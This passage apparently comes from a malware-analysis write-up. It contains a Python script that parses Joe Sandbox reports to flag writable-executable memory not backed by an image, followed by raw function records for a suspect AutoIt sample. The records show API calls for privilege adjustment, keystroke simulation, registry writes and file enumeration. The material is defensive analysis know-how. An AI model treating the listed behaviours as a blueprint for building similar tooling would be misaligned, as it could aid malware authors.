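MEM_IMAGE = 0x1000000
WX_PROTECTIONS = {PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

# Constructed sample: two records trimmed from the report lines above.
SAMPLE = """\
APIs
• Sleep.KERNELBASE(000001F4), ref: 0104FB49
Memory Dump Source
• Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
Similarity
• API ID: Sleep
• Instruction Fuzzy Hash: D4E0BF7494020EEFDB00DFA8D5496DE7BB4EF04301F1005A1FD05D7680DB309E54CA66
APIs
  • Part of subcall function 00E04BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00E04BEF
• FreeLibrary.KERNEL32(?,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04E7E
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
Similarity
• API ID: FreeLibrary
• Instruction Fuzzy Hash: 31F065F1501712CFCB349F64E594852B7F1BF14369320993EE2D7A6690C7319885DF40
"""

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
SRC_RE = re.compile(
    r"^•\s*Source File:\s*(?P<file>\S+)\.sdmp,\s*Offset:\s*(?P<off>[0-9A-F]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                      # address of the call site
    subcall: Optional[str] = None  # set when the call is inside a callee


@dataclass
class FunctionRecord:
    base: int = 0
    protect: int = 0
    alloc_protect: int = 0
    mem_type: int = 0
    pe_backed: bool = False
    api_id: str = ""
    fuzzy_hash: str = ""
    apis: List[ApiCall] = field(default_factory=list)


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per function; a record is closed by its Instruction Fuzzy Hash line."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["sub"]))
            continue
        m = SRC_RE.match(line)
        if m:
            f = m["file"].split(".")
            # Assumed layout of the eight dot-separated fields:
            # proc index, stage, dump id, base, Protect, AllocationProtect, Type, module index.
            cur.base, cur.protect = int(f[3], 16), int(f[4], 16)
            cur.alloc_protect, cur.mem_type = int(f[5], 16), int(f[6], 16)
            cur.pe_backed = m["pe"] == "true"
            continue
        if line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = FunctionRecord()
    return records


def suspicious_regions(records: List[FunctionRecord]) -> List[FunctionRecord]:
    """Functions in writable+executable memory that no PE image backs: the usual
    footprint of unpacked or injected code, as opposed to the AutoIt runtime."""
    return [r for r in records
            if not r.pe_backed and r.protect in WX_PROTECTIONS and r.mem_type != MEM_IMAGE]


def sleep_delays_ms(record: FunctionRecord) -> List[int]:
    """Millisecond arguments of Sleep calls in a record (000001F4 is 500 ms)."""
    return [int(c.args[0], 16) for c in record.apis if c.name == "Sleep" and c.args]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in suspicious_regions(recs):
        print(f"W+X non-image region at {r.base:08X}: {r.api_id} delays={sleep_delays_ms(r)} ms")
```

Running the script reports the 0104D000 region (PAGE_EXECUTE_READWRITE, MEM_PRIVATE, not PE-backed) and its 500 ms Sleep, while the FreeLibrary function in the image at 00E00000 is left alone. Over a full report the same parser lets you pivot on Instruction Fuzzy Hash values of the flagged functions to match them against other samples.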
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E8CB37
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8CB95
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E8CBD6
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8CC00
                                                                      • SendMessageW.USER32 ref: 00E8CC29
                                                                      • _wcsncpy.LIBCMT ref: 00E8CC95
                                                                      • GetKeyState.USER32(00000011), ref: 00E8CCB6
                                                                      • GetKeyState.USER32(00000009), ref: 00E8CCC3
                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8CCD9
                                                                      • GetKeyState.USER32(00000010), ref: 00E8CCE3
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8CD0C
                                                                      • SendMessageW.USER32 ref: 00E8CD33
                                                                      • SendMessageW.USER32(?,00001030,?,00E8B348), ref: 00E8CE37
                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E8CE4D
                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E8CE60
                                                                      • SetCapture.USER32(?), ref: 00E8CE69
                                                                      • ClientToScreen.USER32(?,?), ref: 00E8CECE
                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E8CEDB
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E8CEF5
                                                                      • ReleaseCapture.USER32 ref: 00E8CF00
                                                                      • GetCursorPos.USER32(?), ref: 00E8CF3A
                                                                      • ScreenToClient.USER32(?,?), ref: 00E8CF47
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8CFA3
                                                                      • SendMessageW.USER32 ref: 00E8CFD1
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D00E
                                                                      • SendMessageW.USER32 ref: 00E8D03D
                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E8D05E
                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E8D06D
                                                                      • GetCursorPos.USER32(?), ref: 00E8D08D
                                                                      • ScreenToClient.USER32(?,?), ref: 00E8D09A
                                                                      • GetParent.USER32(?), ref: 00E8D0BA
                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8D123
                                                                      • SendMessageW.USER32 ref: 00E8D154
                                                                      • ClientToScreen.USER32(?,?), ref: 00E8D1B2
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E8D1E2
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D20C
                                                                      • SendMessageW.USER32 ref: 00E8D22F
                                                                      • ClientToScreen.USER32(?,?), ref: 00E8D281
                                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E8D2B5
                                                                        • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E8D351
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                      • String ID: @GUI_DRAGID$F$pb
                                                                      • API String ID: 3977979337-96320988
                                                                      • Opcode ID: c3cb04bf74e325a07b5cd1ec69bf0cc19d5b111aa3010e5b3f85dcbf9d002ed2
                                                                      • Instruction ID: 2d87dc60d2a6efa971fde584f257444e9b98c4e85885e6aca41c8a790c761ca9
                                                                      • Opcode Fuzzy Hash: c3cb04bf74e325a07b5cd1ec69bf0cc19d5b111aa3010e5b3f85dcbf9d002ed2
                                                                      • Instruction Fuzzy Hash: 2042DE75204640AFC724EF25CC48EAABBE5FF49314F241A29F55DA72B0C731E884DBA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: _memmove$_memset
• String ID: ]$3c$DEFINE$P\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
• API String ID: 1357608183-1767882695
• Opcode ID: 9a3f9842fcb9a43092ef69f3882388bc25b3c4d68b3daabe09d728b701a9538f
• Instruction ID: e1fbcf9b3574e49614b32ce47e45b54c97df66737a5eeb5fde4235c3d99795a0
• Opcode Fuzzy Hash: 9a3f9842fcb9a43092ef69f3882388bc25b3c4d68b3daabe09d728b701a9538f
• Instruction Fuzzy Hash: 4293CF71A00219DBDB24CFA8C881BEDB7B1FF48715F24956AED45BB280E7709E85CB40
APIs
• GetForegroundWindow.USER32(00000000,?), ref: 00E048DF
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E3D665
• IsIconic.USER32(?), ref: 00E3D66E
• ShowWindow.USER32(?,00000009), ref: 00E3D67B
• SetForegroundWindow.USER32(?), ref: 00E3D685
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E3D69B
• GetCurrentThreadId.KERNEL32 ref: 00E3D6A2
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00E3D6AE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3D6BF
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3D6C7
• AttachThreadInput.USER32(00000000,?,00000001), ref: 00E3D6CF
• SetForegroundWindow.USER32(?), ref: 00E3D6D2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D6E7
• keybd_event.USER32(00000012,00000000), ref: 00E3D6F2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D6FC
• keybd_event.USER32(00000012,00000000), ref: 00E3D701
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D70A
• keybd_event.USER32(00000012,00000000), ref: 00E3D70F
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3D719
• keybd_event.USER32(00000012,00000000), ref: 00E3D71E
• SetForegroundWindow.USER32(?), ref: 00E3D721
• AttachThreadInput.USER32(?,?,00000000), ref: 00E3D748
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: 10cd2f606de36d2bfd593e2ff3309cf3ba87b96007f39b3cca8041b6c6161ba2
• Instruction ID: 78e8d652569431a300af5f9a664de7c9e010644c3e1f7b1fea71e7a3d02040de
• Opcode Fuzzy Hash: 10cd2f606de36d2bfd593e2ff3309cf3ba87b96007f39b3cca8041b6c6161ba2
• Instruction Fuzzy Hash: 2C315371A40318BEEB216B629C49F7F7E6CEB44B50F104026FA08FA1D1D6B05D51EBA1
APIs
  • Part of subcall function 00E587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5882B
  • Part of subcall function 00E587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58858
  • Part of subcall function 00E587E1: GetLastError.KERNEL32 ref: 00E58865
• _memset.LIBCMT ref: 00E58353
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E583A5
• CloseHandle.KERNEL32(?), ref: 00E583B6
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E583CD
• GetProcessWindowStation.USER32 ref: 00E583E6
• SetProcessWindowStation.USER32(00000000), ref: 00E583F0
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E5840A
  • Part of subcall function 00E581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58309), ref: 00E581E0
  • Part of subcall function 00E581CB: CloseHandle.KERNEL32(?,?,00E58309), ref: 00E581F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Opcode ID: 9eab467e507ae062601f9702a3eda367d0ca2d237a5da2a01ddba5a9d8571114
• Instruction ID: 9d0389cb158623c2b5a777982d81f11258f99a295e31df1f5942fa285645223f
• Opcode Fuzzy Hash: 9eab467e507ae062601f9702a3eda367d0ca2d237a5da2a01ddba5a9d8571114
• Instruction Fuzzy Hash: F1818B71800209AFDF119FA5DE45AEE7BB8FF08309F146569FD14B6261EB318E18DB60
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00E6C78D
• FindClose.KERNEL32(00000000), ref: 00E6C7E1
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6C806
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6C81D
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00E6C844
• __swprintf.LIBCMT ref: 00E6C890
• __swprintf.LIBCMT ref: 00E6C8D3
  • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
• __swprintf.LIBCMT ref: 00E6C927
  • Part of subcall function 00E23698: __woutput_l.LIBCMT ref: 00E236F1
• __swprintf.LIBCMT ref: 00E6C975
  • Part of subcall function 00E23698: __flsbuf.LIBCMT ref: 00E23713
  • Part of subcall function 00E23698: __flsbuf.LIBCMT ref: 00E2372B
• __swprintf.LIBCMT ref: 00E6C9C4
• __swprintf.LIBCMT ref: 00E6CA13
• __swprintf.LIBCMT ref: 00E6CA62
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 3953360268-2428617273
• Opcode ID: ff74dbe3d7cf77f5f3a4b96095853bf594404b2f504940ab744be5a8e1caff92
• Instruction ID: 8ed1055cec48469b0dc0e743bed3c2eafc48dcb129af436ed61f5efff3843b94
• Opcode Fuzzy Hash: ff74dbe3d7cf77f5f3a4b96095853bf594404b2f504940ab744be5a8e1caff92
• Instruction Fuzzy Hash: 77A14EB1408304AFC714EFA4D885DAFB7ECFF94704F405919F595A7192EA34EA48CB62
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00E6EFB6
• _wcscmp.LIBCMT ref: 00E6EFCB
• _wcscmp.LIBCMT ref: 00E6EFE2
• GetFileAttributesW.KERNEL32(?), ref: 00E6EFF4
• SetFileAttributesW.KERNEL32(?,?), ref: 00E6F00E
• FindNextFileW.KERNEL32(00000000,?), ref: 00E6F026
• FindClose.KERNEL32(00000000), ref: 00E6F031
• FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F04D
• _wcscmp.LIBCMT ref: 00E6F074
• _wcscmp.LIBCMT ref: 00E6F08B
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F09D
• SetCurrentDirectoryW.KERNEL32(00EB8920), ref: 00E6F0BB
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F0C5
• FindClose.KERNEL32(00000000), ref: 00E6F0D2
• FindClose.KERNEL32(00000000), ref: 00E6F0E4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
• Opcode ID: 4c9309f2813247dacf67aba1627603244b4edb4e9eaec532d00cb1d1daff8d5a
• Instruction ID: a08caa539672842f1df0d5c4096a28a70d75f7615f88aaec5fc0738a4a5457d2
• Opcode Fuzzy Hash: 4c9309f2813247dacf67aba1627603244b4edb4e9eaec532d00cb1d1daff8d5a
• Instruction Fuzzy Hash: 5431C0325412196EDB14EFB5FC59AEE77AC9F483A4F101176E808F21A1DB70DA84CB61
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80953
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00E8F910,00000000,?,00000000,?,?), ref: 00E809C1
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E80A09
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E80A92
• RegCloseKey.ADVAPI32(?), ref: 00E80DB2
• RegCloseKey.ADVAPI32(00000000), ref: 00E80DBF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
• Opcode ID: 6362437da6c920679a9776d523a3e14c50f901dfad90aa43344406f5b7095f4b
• Instruction ID: d50a94de333f4a8f155b5dc304ca1e911a27d4fe37dd1046de9a343c1b176aa8
• Opcode Fuzzy Hash: 6362437da6c920679a9776d523a3e14c50f901dfad90aa43344406f5b7095f4b
• Instruction Fuzzy Hash: AA027C756006119FCB54EF24D841E2AB7E5FF89324F04985CF99AAB3A2CB30EC45CB91
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID:
• String ID: 0D$0E$0F$3c$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG$_
• API String ID: 0-821810444
• Opcode ID: e0dd3d6a6376b4f1061cbf2d775763b031dabd0a9885d391cf313263e4914625
• Instruction ID: 0aa15cad3053ce6165c6327799c55ca489ce9b28a982aeaaacc10cae20ec36f1
• Opcode Fuzzy Hash: e0dd3d6a6376b4f1061cbf2d775763b031dabd0a9885d391cf313263e4914625
• Instruction Fuzzy Hash: 9D728F75E00219DBDB14CF59C890BEEB7B5FF48314F1495AAE809FB290E7709A85CB90
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00E6F113
• _wcscmp.LIBCMT ref: 00E6F128
• _wcscmp.LIBCMT ref: 00E6F13F
  • Part of subcall function 00E64385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E643A0
• FindNextFileW.KERNEL32(00000000,?), ref: 00E6F16E
• FindClose.KERNEL32(00000000), ref: 00E6F179
• FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F195
• _wcscmp.LIBCMT ref: 00E6F1BC
• _wcscmp.LIBCMT ref: 00E6F1D3
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F1E5
• SetCurrentDirectoryW.KERNEL32(00EB8920), ref: 00E6F203
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F20D
• FindClose.KERNEL32(00000000), ref: 00E6F21A
• FindClose.KERNEL32(00000000), ref: 00E6F22C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
• Opcode ID: d8d1714668c4ff331db10a7f3599ac0efba0d50a148ccbf619c914248af0b81e
• Instruction ID: 264b525abbb2aef1e916bac3eb9cfe44abfe06b1b31b155a1d2abc8d9fe7998b
• Opcode Fuzzy Hash: d8d1714668c4ff331db10a7f3599ac0efba0d50a148ccbf619c914248af0b81e
• Instruction Fuzzy Hash: CB31E0365812196ADB20AEA4FC58AEE77AC9F853A4F101171E808F21A1DB30DE45CF64
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E6A20F
                                                                      • __swprintf.LIBCMT ref: 00E6A231
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E6A26E
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E6A293
                                                                      • _memset.LIBCMT ref: 00E6A2B2
                                                                      • _wcsncpy.LIBCMT ref: 00E6A2EE
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E6A323
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E6A32E
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00E6A337
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E6A341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 2733774712-3457252023
                                                                      • Opcode ID: f0389e80293de4fb6290fb5ef25e93538695083605f536050fff34a3008f14d1
                                                                      • Instruction ID: fdc484e7dd26daf04d697358090c2161eac57039da626d9562bfa0805e08e1ee
                                                                      • Opcode Fuzzy Hash: f0389e80293de4fb6290fb5ef25e93538695083605f536050fff34a3008f14d1
                                                                      • Instruction Fuzzy Hash: 5031C0B1940109ABDB20DFA1EC49FEB37BCEF88745F1451B6F508F2160EB7096448B25
                                                                      APIs
                                                                        • Part of subcall function 00E58202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E5821E
                                                                        • Part of subcall function 00E58202: GetLastError.KERNEL32(?,00E57CE2,?,?,?), ref: 00E58228
                                                                        • Part of subcall function 00E58202: GetProcessHeap.KERNEL32(00000008,?,?,00E57CE2,?,?,?), ref: 00E58237
                                                                        • Part of subcall function 00E58202: HeapAlloc.KERNEL32(00000000,?,00E57CE2,?,?,?), ref: 00E5823E
                                                                        • Part of subcall function 00E58202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E58255
                                                                        • Part of subcall function 00E5829F: GetProcessHeap.KERNEL32(00000008,00E57CF8,00000000,00000000,?,00E57CF8,?), ref: 00E582AB
                                                                        • Part of subcall function 00E5829F: HeapAlloc.KERNEL32(00000000,?,00E57CF8,?), ref: 00E582B2
                                                                        • Part of subcall function 00E5829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E57CF8,?), ref: 00E582C3
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E57D13
                                                                      • _memset.LIBCMT ref: 00E57D28
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E57D47
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00E57D58
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E57D95
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E57DB1
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00E57DCE
                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E57DDD
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E57DE4
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E57E05
